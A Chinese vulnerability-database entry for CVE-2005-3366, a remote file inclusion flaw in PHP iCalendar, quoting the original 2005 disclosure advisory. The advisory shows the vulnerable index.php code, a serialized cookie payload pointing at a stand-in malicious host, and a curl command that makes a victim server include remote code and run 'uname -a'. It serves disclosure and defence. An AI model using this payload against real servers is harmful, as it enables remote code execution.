PHP ICalendar Default_View 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1197475 漏洞类型 跨站脚本
发布时间 2005-10-30 更新时间 2005-10-31
CVE编号 CVE-2005-3366 CNNVD-ID CNNVD-200510-277
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2005100059
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-277
|漏洞详情
PHPiCalendar是基于PHP的iCal文件查看器/解析器,用于在浏览器中显示日历。PHPiCalendar2.0a2到2.0.1的index.php存在PHP文件包含漏洞。远程攻击者可以借助phpicalendarcookie,执行任意PHP代码并包含任意本地文件。注:此问题并非最初的研究人员所称的跨站脚本攻击(XSS)问题。
|漏洞EXP
PHP iCalendar CSS

Name              Cross-Site-Scripting Vulnerabilities in PHP iCalendar
 Severity          Medium Risk
 Vendor            http://www.phpicalendar.net
 Advisory          http://www.ush.it/2005/10/25/php-icalendar-css/
 Additional (it) http://www.ush.it/team/ascii/hack-PHP-iCalendar/adv.txt
 Author            Francesco 'aScii' Ongaro (ascii at katamail . com)
 Date              20051023

I. BACKGROUND

PHP iCalendar is a php calendar, more information is available at the
vendor site.

II. DESCRIPTION

PHP iCalendar is vulnerable to Cross Site Scripting cause of a wrong
input validation in index.php and will include an arbitrary file
ending with .php.

The vulnerable code is:

> config.inc.php

$printview_default = 'no';

> index.php

if (isset($_COOKIE['phpicalendar'])) {
 $phpicalendar = unserialize(stripslashes($_COOKIE['phpicalendar']));
 $default_view = $phpicalendar['cookie_view'];
}

if ($printview_default == 'yes') {
 $printview = $default_view;
 $default_view = "print.php";
} else {
 $default_view = "$default_view".".php";
}

include($default_view);

As you can see there is no input validation at all.

III. ANALYSIS

This vulnerability can be exploited using an hand-crafted cookie with
the right serialized array inside.

a:1:{s:11:"cookie_view";s:23:"http://www.mali.cious/script";}

curl http://www.vic.tim/path/ -b 'phpicalendar=a%3A1%3A%7Bs%3A11%3A%22cook
ie_view%22%3Bs%3A34%3A%22http%3A%2F%2Fwww.
ush.it%2Fteam%2Fascii%2F-----%22%3B%7D' -d 'user=uname -a'

IV. DETECTION

PHP iCalendar 2.0a2, 2.0b, 2.0c, 2.0.1 are vulnerable.

V. WORKAROUND

Input validation or header location will fix the vulnerability.
PHP no remote fopen and open basedir will play also (if not..).

VI. VENDOR RESPONSE

Vendor fixed the bug in the cvs tree, not verified.

http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail1.txt
http://www.ush.it/team/ascii/hack-PHP-iCalendar/mail2.txt

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051023 Bug discovered
20051024 Working exploit written
20051025 Sikurezza.org notification
20051025 Initial vendor notification
20051025 Initial vendor response
20051025 Vendor CVS fix
20051025 Public disclosure

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco 'aScii' Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
|参考资料

来源:MISC
链接:http://www.ush.it/2005/10/25/php-icalendar-css/
来源:BUGTRAQ
名称:20051025PHPiCalendarCSS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113025930517426&w=2
来源:FULLDISC
名称:20051025PHPiCalendarCSS
链接:http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0512.html
来源:XF
名称:phpicalendar-index-file-include(22864)
链接:http://xforce.iss.net/xforce/xfdb/22864
来源:BID
名称:15193
链接:http://www.securityfocus.com/bid/15193
来源:SECUNIA
名称:17328
链接:http://secunia.com/advisories/17328/
来源:VUPEN
名称:ADV-2005-2204
链接:http://www.frsirt.com/english/advisories/2005/2204
来源:SECTRACK
名称:1015102
链接:http://securitytracker.com/id?1015102
来源:SREASON
名称:113
链接:http://securityreason.com/securityalert/113